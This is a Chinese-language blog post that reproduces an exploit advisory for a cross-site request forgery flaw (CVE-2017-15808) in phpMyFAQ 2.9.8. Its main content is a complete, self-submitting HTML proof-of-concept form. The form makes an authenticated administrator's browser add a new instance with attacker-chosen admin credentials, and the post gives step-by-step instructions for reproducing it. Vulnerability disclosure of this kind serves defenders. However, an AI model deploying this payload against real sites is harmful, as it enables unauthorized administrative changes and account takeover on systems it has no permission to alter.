phpMyFaq 2.9.8中的跨站请求伪造(CSRF)漏洞利用详情

本文详细描述了phpMyFaq 2.9.8版本中存在的一个跨站请求伪造(CSRF)漏洞(CVE-2017-15808)。漏洞允许攻击者通过诱骗已认证的管理员访问恶意页面,在目标应用上执行未经授权的操作,例如添加新的恶意实例。文章提供了完整的漏洞概念验证(PoC)代码和复现步骤。

漏洞标题:phpMyFaq 2.9.8 - 跨站请求伪造(CSRF)

日期:2025-11-25

漏洞作者:CodeSecLab

供应商主页:https://github.com/thorsten/phpMyFAQ/

软件链接:https://github.com/thorsten/phpMyFAQ/

版本:2.9.8

测试环境:Windows 10

CVE:CVE-2017-15808

PoC 代码:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
<html>
  <body>
    <form action="http://phpmyfaq/admin/index.php" method="GET">
      <input type="hidden" name="action" value="ajax">
      <input type="hidden" name="ajax" value="config">
      <input type="hidden" name="ajaxaction" value="add_instance">
      <input type="hidden" name="url" value="malicious">
      <input type="hidden" name="instance" value="malicious_instance">
      <input type="hidden" name="comment" value="CSRF Test">
      <input type="hidden" name="email" value="attacker@example.com">
      <input type="hidden" name="admin" value="attacker">
      <input type="hidden" name="password" value="password123">
      <input type="submit" value="Submit request">
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

复现步骤:

  1. 将上述代码保存为 poc.html
  2. 登录 phpmyfaq,并在同一浏览器中打开该文件。
  3. 操作将被执行。
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计